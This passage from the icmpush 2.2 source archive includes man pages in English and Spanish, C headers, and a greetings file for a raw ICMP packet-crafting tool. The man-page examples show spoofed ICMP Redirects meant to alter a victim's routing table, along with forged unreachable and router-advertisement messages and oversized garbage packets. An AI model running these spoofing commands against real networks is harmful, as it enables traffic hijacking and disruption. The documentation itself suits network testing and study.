smaller IP packet precedence has tried to be sent over the minimous impossed by network's manager. .IP "- To be used with \fBRedirect\fP type (\fB-red\fP):" .PP \fInet\fP (Redirect Datagram for the Network) shows that destination is a network. \fIhost\fP (Redirect Datagram for the Host) shows that destination is a host. \fIserv-net\fP (Redirect Datagram for the Type Of Service and Network) destination is a type of service and network. \fIserv-host\fP (Redirect Datagram for the Type Of Service and Host) destination is a type of service and host. .PP and .IP "- to be used with \fB\Time Exceeded\fP type (\fB-tx\fP):" .PP \fIttl\fP (Time to Live exceeded in Transit) time is over on an IP's header packet. \fIfrag\fP (Fragment Reassembly Time Exceeded) could not put IP's packet fragment together again. .SH "RETURN CODES" \fBicmpush\fP can be easily used within shell scripts. Program returns the following data to the shell: .ti Value Meaning .ti ----- ----------- .ti 0 Finished program OK. .ti 1 Incorrect argument number. .ti 2 Unkown ICMP protocol. .ti 3 Cannot create RAW socket type. .ti 4 Erroneous ICMP packet. .ti 5 Erroneous gateway. .ti 6 Erroneous destination route. .ti 7 Erroneous ICMP packet code. .ti 8 Erroneous source host. .ti 9 Error sending packet. .ti 10 Protocol still not implemented. .ti 11 Erroneous IP address or spoof host incorrect. .ti 12 Could not save memory for the data_hdr union. .ti 13 Erroneous IP address or packet destination host. .ti 14 Unkown protocol. .ti 16 Error reading RAW socket. .ti 17 Error initializing signal handler SIGALARM. .ti 18 Echo Request packet data too big. .ti 19 Source port incorrect. .ti 20 Destination port incorrect. .ti 21 Incorrect timeout value. .ti 22 Incorrect Echo ID. .ti 23 Incorrect sequence number. .ti 24 Erroneous Echo data. .ti 25 IP_HDRINCL error. .ti 26 Erroneous router address in Router Advertisement. .ti 27 Incorrect garbage bytes number. .ti 28 Incorrect ICMP pointer Parameter Problem. .SH "EXAMPLES" - In response to a packet send with TCP source port 100 and destination on port 90, we want to send and ICMP Redirect to asshole.es to modify its routing table with the following data: 10.12.12.12 as a gateway to the host death.es masking the packet source as if it was sent from infect.comx host: \fBicmpush -red -sp\fP \fIinfect.comx\fP \fB-gw\fP \fI10.12.12.12\fP \fB-dest\fP \fIdeath.es\fP \fB-c\fP \fIhost\fP \fB-prot\fP \fItcp\fP \fB-psrc\fP \fI100\fP \fB-pdst\fP \fI90 asshole.es\fP - In response to an ICMP packet Echo Request sent with Echo Request id 100 and Echo Request sequence number 90, we want to send an ICMP Redirect to the host hemorroids.es to modify its routing table with the following data: the host pizza.death as a gateway to the host death.es, masking the packet source as if iit was sent from infect.comx host. \fBicmpush -red -sp\fP \fIinfect.comx\fP \fB-gw\fP \fIpizza.death\fP \fB-dest\fP \fIdeath.es\fP \fB-c\fP \fIhost\fP \fB-prot\fP \fIicmp\fP \fB-id\fP \fI100\fP \fB-seq\fP \fI90 hemorroids.es\fP - We want to send an ICMP packet Destination Unreach to the host 10.2.3.4 saying that our TCP port number 20 connected with his TCP port 2100, is unreachable. We mask ourselves as host 10.1.1.1: \fBicmpush -du -sp\fP \fI10.1.1.1\fP \fB-c\fP \fIport-unreach\fP \fB-prot\fP \fItcp\fP \fB-psrc\fP \fI2100\fP \fB-pdst\fP \fI20 10.2.3.4\fP - We want to send an ICMP packet Destination Unreach to host 10.2.3.4 saying that the host inferno.hell and its TCP port 69, connected with his port TCP 666 in unreacheable. We mask ourselves as gateway router.comx: \fBicmpush -du -sp\fP \fIrouter.comx\fP \fB-c\fP \fIhost-unreach\fP \fB-prot\fP \fItcp\fP \fB-psrc\fP \fI666\fP \fB-pdst\fP \fI69\fP \fB-orig\fP \fIinferno.hell 10.2.3.4\fP - We want to send a packet ICMP Source Quench to host ldg02.hell in response to a packet destinated to host ldg00 with UDP protocol, source port 100 and destination port 200. We mask ourselves as gateway 10.10.10.1: \fBicmpush -sq -sp\fP \fI10.10.10.1\fP \fB-prot\fP \fIudp\fP \fB-psrc\fP \fI100\fP \fB-pdst\fP \fI200\fP \fB-orig\fP \fIldg00 ldg02.hell\fP - We want to send an ICMP packet Time Exceeded to host ldg02.hell in response to a packet destinated to host ldg00 with UDP protocol, source port 100 and destination port 200. We mask as gateway ldg04.hell: \fBicmpush -tx -sp\fP \fIldg04.hell\fP \fB-c\fP \fIfrag\fP \fB-prot\fP \fIudp\fP \fB-psrc\fP \fI100\fP \fB-pdst\fP \fI200\fP \fB-orig\fP \fIldg00 ldg02.hell\fP - We want to send an ICMP packet Address Mask Request and wait 10 seconds to see the replies. We mask the packet with source address of 10.2.3.4 and we send it to the address 10.0.1.255: \fBicmpush -mask -sp\fP \fI10.2.3.4\fP \fB-to\fP \fI10 10.0.1.255\fP - We want to send an ICMP packet Timestamp to host sepultura.hell. We mask the packet as if it were send from host 10.2.3.1. We use the default timeout (5 seconds): \fBicmpush -tstamp --spoof\fP \fI10.2.3.1 sepultura.hell\fP - We want to send an ICMP packet Information Request to host voucher.hell. The source address will be our own IP address, and the timeout will be 20 seconds: \fBicmpush -info -to\fP \fI20 voucher.hell\fP - We want to send an ICMP packet Router Solicitation to host lazy.hell. The source address will be our own IP address and the timeout will be 20 seconds: \fBicmpush -rts --timeout\fP \fI20 lazy.hell\fP - We want to send an ICMP packet Echo Request to host lazy.hell with the data pattern 'MyNameIsGump'. The source address will be our own IP address and the timeout to read the data will be 2 seconds: \fBicmpush -echo -data\fP \fIMyNameIsGump\fP \fB-to\fP \fI2 lazy.hell\fP - We want to send ICMP packet Echo Request to 10.12.0.255 with the following data pattern: 'D E A T H' (blanks included). We will mask the source address as 192.168.0.255, and we do not want to read the answers: \fBicmpush -echo -sp\fP \fI192.168.0.255\fP \fB-data\fP \fI'D E A T H'\fP \fB-to\fP \fI0 192.168.0.255\fP - We want to send an ICMP packet Destination Unreach to host destination.death but sending it with an ICMP code bigger to the legal ones adding also 60K of garbage data: \fBicmpush -du -c\fP \fImax\fP \fB-gbg\fP \fI60000 destination.death\fP - We want to send an ICMP Router Advertisement to host death.es, saying that the routers to use are: router1.xtc with preference 20, router2.xtc with preference 50 and router3.xtc with default preference (0). We mask ourselves as fatherouter.xtc \fBicmpush -rta\fP \fIrouter1.xtc/20\fP \fB-rta\fP \fIrouter2.xtc/50\fP \fB-rta\fP \fIrouter3.xtc\fP \fB-sp\fP \fIfatherouter.xtc death.es\fP - We send an ICMP Parameter Problem to host misery.es saying that the packet sent from the host hick.org with udp protocol, source port 13 and destination port 53, has an error on the IP header byte 13. We will also add all garbage bytes as possible: \fBicmpush -sp\fP \fIhick.org\fP \fB-param -ptr\fP \fI13\fP \fB-prot\fP \fIudp\fP \fB-psrc\fP \fI13\fP \fB-pdest\fP \fI53\fP \fB-gbg\fP \fImax\fP \fImisery.es\fP - We want to send an ICMP packet Timestamp to host www.hicks.org with code 38 instead of code (0) as usual: \fBicmpush -tstamp -c 38 \fIwww.hicks.org\fP .SH SEE ALSO Postel, John, "Internet Control Message Protocol - DARPA Internet Program Protocol Specification", \fIRFC 792\fP, USC/Information Sciences Institute, September 1981. Mogul, Jeffrey and John Postel, "Internet Standard Subnetting Procedure", \fIRFC 950\fP, Stanford, USC/Information Sciences Institute, August 1985. Braden, Robert, "Requeriments for Internet Hosts - Communication Layers", \fIRFC 1122\fP, USC/Information Sciences Institute, October 1989. Deering, Stephen, "ICMP Router Discovery Messages", \fIRFC 1256\fP, Xerox PARC, September 1991. Baker, Fred, "Requeriments for IP Version 4 Routers", \fIRFC 1812\fP, Cisco Systems, June 1995. The \fILinux source code\fP, everything referent to network code and to ICMP protocol. .SH AUTHOR Slayer icmpush-2.2.orig/GREETINGS0100644000175000017500000000173006664232213013364 0ustar domdom Spanish friends: Hades, Jfs, netsavage, sierra, wait_man (good man page!), Shinji, ngneer, Lec, Dairo, Lth, binaria (good work!) and ppl from the 'irc-hispano.org' channel #hack Rest of the world: Ken Williams (aka Packetstorm Tattooman) for their support and all of the ppl (like Sean) who send his opinions, bugs and suggestions to me. And last, but not least, my girlfriend, Conchi, that becomes my principal reason to live on (Yeah! And she hates computers!). ---------------- A "lovely" 'F**K U!' to the ppl who f*cked me for the only reason of enjoy working (and playing) at network security ... ... *YOU* know who you are. :_( --------------- Mi más sincero *JODETE* a las personas que me han amargado la vida últimamente por el hecho de gustarme la seguridad informática... ... sí, *VOSOTROS* sabéis quienes sois. :-( Madrid, 1999. Slay. icmpush-2.2.orig/err_msg.h0100644000175000017500000000513106662150773013730 0ustar domdom#ifndef __ERR_MSG_H__ #define __ERR_MSG_H__ char *mensaje_err[][2]= { { "Programa finalizado satisfactoriamente", "Program finished OK" }, { "Error en número de argumentos", "Wrong number of arguments" }, { "Protocolo ICMP desconocido", "Unknown ICMP protocol" }, { "No puedo crear socket tipo RAW", "Can't build RAW sockets" }, { "Tipo de paquete ICMP falta o es incorrecto", "Incorrect or missing ICMP packet type" }, { "Gateway incorrecto", "Wrong gateway" }, { "Destino de ruta falta o es incorrecto", "Incorrect or missing route destination" }, { "Código de paquete ICMP falta o es incorrecto", "Incorrect or missing ICMP packet code" }, { "Host original incorrecto", "Wrong original host" }, { "Error enviando paquete", "Error while sending packet" }, { "Protocolo todavía no implementado", "Protocol still not implemented" }, { "Dirección IP o host de spoof incorrecto", "Wrong spoof IP or hostname" }, { "No pude reservar memoria para unión data_hdr", "Can't allocate union data_hdr memory" }, { "Dirección IP o host destino falta o es incorrecto", "Missing or wrong destination IP or hostname" }, { "Protocolo desconocido", "Unknown protocol" }, { "No puedo crear socket de lectura RAW", "Can't build read RAW socket" }, { "Error leyendo socket RAW", "Error while reading RAW socket" }, { "Error al iniciar manejador de señal", "Error while initializing signal handler" }, { "Patrón de datos demasiado grande", "Data pattern too big. Don't be cruel :)" }, { "Puerto origen incorrecto", "Incorrect source port value" }, { "Puerto destino incorrecto", "Incorrect destination port value" }, { "Valor de timeout incorrecto", "Incorrect timeout value" }, { "Echo ID incorrecto", "Incorrect Echo ID value" }, { "Número de secuencia incorrecto", "Incorrect sequence number" }, { "Datos de Echo incorrectos", "Incorrect Echo data value" }, { "Error en IP_HDRINCL", "IP_HDRINCL error"}, { "Direccion de router incorrecta", "Incorrect router address" }, { "Bytes basura incorrectos", "Incorrect data garbage" }, { "Puntero incorrecto", "Incorrect pointer value" } }; #endif icmpush-2.2.orig/misc.h0100644000175000017500000000026206662417304013221 0ustar domdom#ifndef __MISC_H__ #define __MISC_H__ #define copymem( s, d, l) memcpy( d, s, l) #define iniciamem( d, l) memset( d, 0, l) #define MAX(x) ( sizeof(x)/sizeof(x[0]) ) #endif icmpush-2.2.orig/packet.h0100644000175000017500000000165206662420026013534 0ustar domdom#ifndef __PACKET_H__ #define __PACKET_H__ /* Linked list of Routers within an ICMP Router Advertisement */ struct router { u_long address; u_long pref; struct router *next; }; struct my_pack { u_long ip_spoof; struct sockaddr_in destino; u_long gway; u_long dest_red; u_long orig; int cod_icmp; u_short tipo_icmp; u_short protocol; u_short p_origen; u_short p_destino; u_long maskaddr; struct router *router; u_short lifetime; u_short num_routers; char *pattern; int size_pattern; int timeout; u_char pointer; u_long garbage; }; #endificmpush-2.2.orig/icmpush.es.80100644000175000017500000004420706664366364014306 0ustar domdom.\" Man page for ICMPush (c) Slayer .\" =============================== .\" .\" You may distribute under the terms of the GNU General Public .\" License as specified in the LICENSE file that comes with the .\" ICMPush v2.2 distribution. .\" .\" Man page author: .\" wait_man .\" Date: .\" Mon Feb 8 01:16:09 CET 1999 .\" Translate from the Spanish to English by: .\" BINARIA .\" .TH "ICMPUSH" "8" "22 de Febrero de 1999" "icmpush v2.2" .SH "NOMBRE" icmpush \- Generador de paquetes ICMP .SH "SINOPSIS" .B icmpush .I tipo [opciones] host .SH "DESCRIPCIÓN" .B icmpush es una aplicación para generar diversos tipos de paquetes ICMP. Actualmente soporta los tipos ICMP de error siguientes: \fIRedirect\fP, \fISource Quench\fP, \fITime Exceeded\fP, \fIDestination Unreach\fP, \fIParameter Problem\fP y los tipos ICMP de información siguientes: \fIAddress Mask Request\fP, \fITimestamp\fP, \fIInformation Request\fP, \fIEcho Request\fP, \fIRouter Solicitation\fP y \fIRouter Advertisement\fP. No es misión de esta página describir en profundidad los entresijos del protocolo ICMP, pero cuanto más conocimiento se tenga del mismo, mejor comprensión se tendrá del uso, funcionamiento y utilidades de esta herramienta. La cantidad de argumentos necesarios puede parecer excesiva, pero, como su propio autor indica, la construcción de un paquete ICMP que se ajuste al formato del protocolo requiere una serie de datos imprescindibles que deben ser suministrados desde la línea de comandos. Hacia el final de esta página se incluye una gran cantidad de ejemplos que ilustran algunas de las posibilidades reales de uso de este programa. .SH "OPCIONES" .IP "\fB\-h\fP, \fB--help\fP" Ayuda. .IP "\fB\-V\fP, \fB--version\fP" Versión del programa. .IP "\fB\-v\fP, \fB--verbose\fP" Modo informativo. .IP "\fB\-vv\fP, \fB--more_verbose\fP" Más informativo aún. Útil para depuración. .PP El \fItipo\fP de ICMP, siguiendo un orden por código de menor a mayor, puede ser cualquiera de los siguientes: .IP "\fB\-du\fP, \fB--dest_unreach\fP" Destination Unreach. El paquete IP no pudo ser entregado. Este tipo ICMP es de \fIerror\fP. .IP "\fB\-sq\fP, \fB--src_quench\fP" Source Quench. El paquete IP no se entrega a causa de una congestión en la red. Este es tipo ICMP es de \fIerror\fP. .IP "\fB\-red\fP, \fB--redirect\fP" Redirect. Requerimiento para desviar paquetes IP a través de otro router. Este tipo ICMP es de \fIerror\fP. .IP "\fB\-echo\fP, \fB--echo_request\fP" Echo Request. Petición a un host para que devuelva una respuesta de eco. Este tipo ICMP es de \fIinformación\fP. .IP "\fB\-rta\fP, \fB--router_advert\fP \fIdirección\fP[\fI/preferencia\fP]" Router Advertisement. El router comunica la disponibilidad de uno o varios routers con dirección \fIdirección\fP y preferencia \fIpreferencia\fP. Si se omite esta última se toma la preferencia por defecto que es 0. Este tipo ICMP es de \fIinformación\fP. .IP "\fB\-rts\fP, \fB--router_solicit\fP" Router Solicitation. Requerimiento por parte de un host para que se envíe un anuncio de uno o varios routers. Como el anterior, forma parte del intercambio de mensajes Router Discovery y es un tipo ICMP de \fIinformación\fP. .IP "\fB\-tx\fP, \fB--time_exc\fP" Time Exceeded. Se ha acabado el tiempo de un paquete IP. Este tipo ICMP es de \fIerror\fP. .IP "\fB\-param\fP, \fB--param_problem\fP" Parameter Problem. Valor erróneo en una variable de la cabecera IP. Este tipo ICMP es de \fIerror\fP. .IP "\fB\-tstamp\fP, \fB--timestamp\fP" Timestamp. Solicitud de la hora de un host. Este tipo ICMP es de \fIinformación\fP. .IP "\fB\-info\fP, \fB--info_req\fP" Information Request. El host solicita una respuesta Info Reply. Este tipo ICMP es de \fIinformación\fP. .IP "\fB\-mask\fP, \fB--mask_req\fP" Address Mask Request. Averiguar la mascara de red para la red local actual. Este tipo ICMP es de \fIinformación\fP. .PP Las \fIopciones\fP pueden ser cualquiera de las siguientes: .IP "\fB\-sp\fP, \fB--spoof\fP \fIdirección\fP" Dirección IP a usar como origen del paquete ICMP. .IP "\fB\-to\fP, \fB--timeout\fP \fIsegundos\fP" Tiempo de espera en segundos para leer las respuestas. Solo es válido para ICMPs de \fIinformación\fP salvo el tipo Router Advertisement (\fB-rta\fP). Por defecto es de 5 segundos. Si se indica 0 no se leen las respuestas. .IP "\fB\-n\fP, \fB--no_resolve\fP" No usar resolución DNS de nombre de host. .IP "\fB\-lt\fP, \fB--lifetime\fP \fIsegundos\fP" Tiempo de vida en segundos de un anuncio de router. Válido solo para Router Advertisement (\fI-rta\fP). Por defecto son 1800 segundos (30'). .IP "\fB\-gw\fP, \fB--gateway\fP \fIdirección\fP" Host que actuará como pasarela de ruta en un ICMP Redirect (\fB-red\fP). Por defecto será la dirección de spoof (\fB-sp\fP), si se ha especificado, o la dirección IP del interfaz de salida si no se ha especificado. .IP "\fB\-dest\fP, \fB--route_dest\fP \fIdirección\fP" Host o red destino de ruta en un ICMP Redirect (\fB-red\fP). Esta opción es obligatoria si se envía un ICMP Redirect. .IP "\fB\-orig\fP, \fB--orig_host\fP \fIdirección\fP" Host origen en la cabecera IP que se envía en la parte de datos de un ICMP de \fIerror\fP. Por defecto será igual a la IP del host al que se manda el paquete ICMP. .IP "\fB\-psrc\fP, \fB--port_src\fP \fIpuerto\fP" Puerto (tcp o udp) origen a usar en la cabecera IP que se envía en la parte de datos de un ICMP de \fIerror\fP. Por defecto es 0. .IP "\fB\-pdst\fP, \fB--port_dest\fP \fIpuerto\fP" Puerto (tcp o udp) destino a usar en la cabecera IP que se envía en la parte de datos de un ICMP de \fIerror\fP. Por defecto es 0. .IP "\fB\-prot\fP, \fB--protocol\fP \fIicmp\fP|\fItcp\fP|\fIudp\fP" Protocolo a usar en la cabecera IP que se envía en la parte de datos de un ICMP de \fIerror\fP. Debe ser uno de los tres listados. Por defecto es tcp. .IP "\fB\-id\fP, \fB--echo_id\fP \fIidentificador\fP" Identificador de Echo usado en la cabecera IP que se envía cuando es un ICMP de \fIerror\fP y el protocolo de la cabecera IP (\fB-prot\fP) de los datos de error es icmp. Por defecto es 0. .IP "\fB\-seq\fP, \fB--echo_seq\fP \fIsecuencia\fP" Número de secuencia de Echo usado en la cabecera IP que se envía cuando es un ICMP de \fIerror\fP y el protocolo de la cabecera IP (\fB-prot\fP) de los datos de error es icmp. Por defecto es 0. .IP "\fB\-pat\fP, \fB--pattern\fP \fIpatrón\fP" Patrón de datos a enviar en un Echo Request (\fB-echo\fP). .IP "\fB\-gbg\fP, \fB--garbage\fP \fIbytes\fP|\fImax\fP" Cantidad de bytes basura que se enviarán en cualquier paquete ICMP. Con \fImax\fP se envía el máximo posible. .IP "\fB\-ptr\fP, \fB--pointer\fP \fIbyte\fP" Puntero a \fIbyte\fP erróneo en un paquete ICMP indicando un problema en un parámetro. Válido sólo para el tipo Parameter Problem (\fB-param\fP). .IP "\fB\-c\fP, \fB--code\fP \fIcódigo\fP|\fInum\fP|\fImax\fP" Código de ICMP enviado. Código \fIcódigo\fP válido para los tipos Destination Unreach (\fB-du\fP), Redirect (\fB-red\fP) y Time Exceeded (\fB-tx\fP). Se puede especificar un código numérico \fInum\fP para los tipos ICMP que no tienen (Echo Request, Information Request, Address Mask Request, Router Solicitation, Router Advertisement, Source Quench, Parameter Problem y Timestamp). Si se usa \fImax\fP se enviará un código ICMP superior a los admitidos. La siguiente sección \fICÓDIGOS ICMP\fP enumera los tipos de código \fIcódigo\fP válidos. .SH "CÓDIGOS ICMP" Los \fIcódigos\fP válidos para usar con los tipos Destination Unreach, Redirect y Time Exceeded son, .IP "- Para usar con el tipo \fBDestination Unreach\fP (\fB-du\fP):" .PP \fInet-unreach\fP (Net Unreachable) indica red de destino no accesible. \fIhost-unreach\fP (Host Unreachable) indica host de destino no accesible. \fIprot-unreach\fP (Protocol Unreachable) indica que el protocolo deseado no está a disposición en el host destino. \fIport-unreach\fP (Port Unreachable) indica que el puerto deseado en el host destino no está disponible. \fIfrag-needed\fP (Fragmentation Needed and Don't Fragment was Set) indica que el paquete IP tuvo que ser fragmentado por su tamaño, pero el emisor no lo permitió por medio del flag DF (DON'T FRAGMENT o NO FRAGMENTAR). \fIsroute-fail\fP (Source Route Failed) indica que no se pudo seguir la ruta deseada que se indicaba en el paquete IP. \fInet-unknown\fP (Destination Network Unknown) indica que no se conoce la red de destino. \fIhost-unknown\fP (Destination Host Unknown) indica que no se conoce el host de destino, pero sí la red. \fIhost-isolated\fP (Source Host Isolated) indica que no se puede acceder al host de destino. \fInet-ano\fP (Communication with Destination Network is Administratively Prohibited) indica que el acceso a la red de destino se deniega, vía cortafuegos o similar, por parte del receptor. \fIhost-ano\fP (Communication with Destination Host is Administratively Prohibited) indica que el acceso al host de destino se deniega, vía cortafuegos o procedimiento análogo, por parte del receptor. \fInet-unr-tos\fP (Destination Network Unreachable for Type of Service) indica que no se puede acceder a la red de destino con el tipo de servicio (TOS, type of service) solicitado. \fIhost-unr-tos\fP (Destination Host Unreachable for Type of Service) indica que no se puede acceder al host destino con el TOS solicitado. \fIcom-admin-prohib\fP (Communication Administratively Prohibited) indica que un router no puede encaminar un paquete por filtrado administrativo. \fIhost-precedence-viol\fP (Host Precedence Violation) indica que la precedencia IP del paquete original no está permitida. \fIprecedence-cutoff\fP (Precedence cutoff in effect) indica que se ha intentado enviar un paquete con un nivel de precedencia IP menor que el mínimo impuesto por los administradores. .IP "- Para usar con el tipo \fBRedirect\fP (\fB-red\fP):" .PP \fInet\fP (Redirect Datagram for the Network) indica que el destino es una red. \fIhost\fP (Redirect Datagram for the Host) indica que el destino es un host. \fIserv-net\fP (Redirect Datagram for the Type Of Service and Network) indica que el destino es tipo de servicio y red. \fIserv-host\fP (Redirect Datagram for the Type Of Service and Host) indica que el destino es tipo de servicio y host. .PP y .IP "- Para usar con el tipo \fB\Time Exceeded\fP (\fB-tx\fP):" .PP \fIttl\fP (Time to Live exceeded in Transit) indica que el tiempo de vida en la cabecera de un paquete IP se ha agotado. \fIfrag\fP (Fragment Reassembly Time Exceeded) indica que los fragmentos de un paquete IP no han podido ser reensamblados. .SH "CÓDIGOS DE RETORNO" \fBicmpush\fP puede ser usado de una forma muy sencilla en guiones del intérprete de comandos que estemos usando (típicamente \fIbash\fP). El programa devuelve los siguientes códigos al shell que le invocó: .ti Valor Significado .ti ----- ----------- .ti 0 Programa finalizado OK. .ti 1 Número de argumentos incorrecto. .ti 2 Protocolo ICMP desconocido. .ti 3 No se pudo crear socket tipo RAW. .ti 4 Tipo de paquete ICMP incorrecto. .ti 5 Gateway incorrecto. .ti 6 Destino de ruta incorrecto. .ti 7 Código de paquete ICMP incorrecto. .ti 8 Host original incorrecto. .ti 9 Error enviando paquete. .ti 10 Protocolo no implementado todavía. .ti 11 Dirección IP o host de spoof incorrecto. .ti 12 No se pudo reservar memoria para unión data_hdr. .ti 13 Dirección IP o host destino del paquete incorrecto. .ti 14 Protocolo desconocido. .ti 16 Error leyendo socket RAW. .ti 17 Error al iniciar manejador de señal SIGALRM. .ti 18 Los datos que se quieren enviar en el paquete Echo Request son demasiado grandes. .ti 19 Puerto origen incorrecto. .ti 20 Puerto destino incorrecto. .ti 21 Valor de timeout incorrecto. .ti 22 Echo ID incorrecto. .ti 23 Número de secuencia incorrecto. .ti 24 Datos de Echo incorrectos. .ti 25 Error en IP_HDRINCL. .ti 26 Dirección de router en Router Advertisement incorrecta. .ti 27 Número de bytes basura incorrecto. .ti 28 Puntero de ICMP Parameter Problem es incorrecto. .SH "EJEMPLOS" - En repuesta a un paquete enviado con origen en el puerto TCP 100 y con destino en el puerto 90, queremos enviar un ICMP Redirect a tontoligo.es para modificar su tabla de rutas con los siguientes datos: 10.12.12.12 como gateway hacia el host death.es enmascarando el origen del paquete como originado desde el host infect.comx: \fBicmpush -red -sp\fP \fIinfect.comx\fP \fB-gw\fP \fI10.12.12.12\fP \fB-dest\fP \fIdeath.es\fP \fB-c\fP \fIhost\fP \fB-prot\fP \fItcp\fP \fB-psrc\fP \fI100\fP \fB-pdst\fP \fI90 tontoligo.es\fP - En respuesta a un paquete ICMP Echo Request enviado con un ECHO REQUEST id 100 y un numero de secuencia ECHO REQUEST 90, queremos enviar un ICMP Redirect al host almorranas.es para modificar su tabla de rutas con los siguientes datos: el host pizza.death como pasarela hacia el host death.es enmascarando el origen del paquete como originado desde el host infect.comx: \fBicmpush -red -sp\fP \fIinfect.comx\fP \fB-gw\fP \fIpizza.death\fP \fB-dest\fP \fIdeath.es\fP \fB-c\fP \fIhost\fP \fB-prot\fP \fIicmp\fP \fB-id\fP \fI100\fP \fB-seq\fP \fI90 almorranas.es\fP - Queremos enviar un paquete ICMP Destination Unreach al host 10.2.3.4 diciéndole que nuestro puerto TCP numero 20, conectado con su puerto TCP 2100, es inalcanzable. Nos enmascaramos como el host 10.1.1.1: \fBicmpush -du -sp\fP \fI10.1.1.1\fP \fB-c\fP \fIport-unreach\fP \fB-prot\fP \fItcp\fP \fB-psrc\fP \fI2100\fP \fB-pdst\fP \fI20 10.2.3.4\fP - Queremos enviar un paquete ICMP Destination Unreach al host 10.2.3.4 diciéndole que el host inferno.hell y su puerto TCP 69, relacionado con su puerto TCP 666 es inalcanzable. Nos enmascaramos como como el gateway router.comx: \fBicmpush -du -sp\fP \fIrouter.comx\fP \fB-c\fP \fIhost-unreach\fP \fB-prot\fP \fItcp\fP \fB-psrc\fP \fI666\fP \fB-pdst\fP \fI69\fP \fB-orig\fP \fIinferno.hell 10.2.3.4\fP - Queremos enviar un paquete ICMP Source Quench al host ldg02.hell en respuesta a un paquete destinado al host ldg00 con protocolo UDP, puerto origen 100 y destino 200. Nos enmascaramos como el gateway 10.10.10.1: \fBicmpush -sq -sp\fP \fI10.10.10.1\fP \fB-prot\fP \fIudp\fP \fB-psrc\fP \fI100\fP \fB-pdst\fP \fI200\fP \fB-orig\fP \fIldg00 ldg02.hell\fP - Queremos enviar un paquete ICMP Time Exceeded al host ldg02.hell en respuesta a un paquete destinado al host ldg00 con protocolo UDP, puerto origen 100 y puerto destino 200. Nos enmascaramos como el gateway ldg04.hell: \fBicmpush -tx -sp\fP \fIldg04.hell\fP \fB-c\fP \fIfrag\fP \fB-prot\fP \fIudp\fP \fB-psrc\fP \fI100\fP \fB-pdst\fP \fI200\fP \fB-orig\fP \fIldg00 ldg02.hell\fP - Queremos enviar un paquete ICMP Address Mask Request y esperar 10 segundos para ver las respuestas. Enmascararemos el paquete con origen en 10.2.3.4 y lo mandaremos a la dirección 10.0.1.255: \fBicmpush -mask -sp\fP \fI10.2.3.4\fP \fB-to\fP \fI10 10.0.1.255\fP - Queremos enviar un paquete ICMP Timestamp al host sepultura.hell. Enmascaramos el paquete como enviado por el host 10.2.3.1. Usamos el tiempo de espera por defecto, 5 segundos: \fBicmpush -tstamp --spoof\fP \fI10.2.3.1 sepultura.hell\fP - Queremos enviar un paquete ICMP Information Request al host nominas.hell. La dirección origen sera nuestra propia dirección IP, y el tiempo de espera sera de 20 segundos: \fBicmpush -info -to\fP \fI20 nominas.hell\fP - Queremos enviar un paquete ICMP Router Solicitation al host vagos.hell. La dirección de origen sera nuestra propia dirección IP, y el tiempo de espera sera de 20 segundos: \fBicmpush -rts --timeout\fP \fI20 vagos.hell\fP - Queremos enviar un paquete ICMP Echo Request al host vagos.hell con un el patrón de datos 'MiNombreEsGump'. La dirección origen sera nuestra propia dirección IP. El tiempo de espera para leer los datos será de 2 segundos: \fBicmpush -echo -data\fP \fIMiNombreEsGump\fP \fB-to\fP \fI2 vagos.hell\fP - Queremos enviar un paquete ICMP Echo Request a 10.12.0.255 con el siguiente patrón de datos: 'D E A T H' (espacios inclusive). La dirección origen la enmascararemos como 192.168.0.255, y no queremos leer las respuestas: \fBicmpush -echo -sp\fP \fI192.168.0.255\fP \fB-data\fP \fI'D E A T H'\fP \fB-to\fP \fI0 192.168.0.255\fP - Queremos enviar un ICMP Destination Unreach al host destino.death pero enviándolo con un código ICMP superior a los legales añadiendo además 60K de datos basura: \fBicmpush -du -c\fP \fImax\fP \fB-gbg\fP \fI60000 destino.death\fP - Queremos enviar un ICMP Router Advertisement al host death.es, diciéndole que los routers a usar son: router1.xtc con preferencia 20, router2.xtc con preferencia 50 y router3.xtc con preferencia por defecto (0). Nos enmascararemos como el router routerpadre.xtc \fBicmpush -rta\fP \fIrouter1.xtc/20\fP \fB-rta\fP \fIrouter2.xtc/50\fP \fB-rta\fP \fIrouter3.xtc\fP \fB-sp\fP \fIrouterpadre.xtc death.es\fP - Queremos enviar un ICMP Parameter Problem al host desgracias.es diciéndole que el paquete que ha enviado al host paleto.org con protocolo udp, puerto origen 13 y puerto destino 53, tiene un error en el byte 13 de la cabecera IP. Además, le añadiremos todos los bytes basura posibles: \fBicmpush -sp\fP \fIpaleto.org\fP \fB-param -ptr\fP \fI13\fP \fB-prot\fP \fIudp\fP \fB-psrc\fP \fI13\fP \fB-pdest\fP \fI53\fP \fB-gbg\fP \fImax\fP \fIdesgracias.es\fP - Queremos enviar un paquete ICMP Timestamp al host www.paletos.org con el código 38 en lugar del código (0) que llevaría normalmente: \fBicmpush -tstamp -c\fP \fI38 www.paletos.org\fP .SH VER TAMBIÉN Postel, John, "Internet Control Message Protocol - DARPA Internet Program Protocol Specification", \fIRFC 792\fP, USC/Information Sciences Institute, September 1981. Mogul, Jeffrey and John Postel, "Internet Standard Subnetting Procedure", \fIRFC 950\fP, Stanford, USC/Information Sciences Institute, August 1985. Braden, Robert, "Requeriments for Internet Hosts - Communication Layers", \fIRFC 1122\fP, USC/Information Sciences Institute, October 1989. Deering, Stephen, "ICMP Router Discovery Messages", \fIRFC 1256\fP, Xerox PARC, September 1991. Baker, Fred, "Requeriments for IP Version 4 Routers", \fIRFC 1812\fP, Cisco Systems, June 1995. El \fIcódigo fuente de Linux\fP, en especial todo lo referente al código de red, y principalmente lo referido al protocolo ICMP. .SH AUTOR Slayer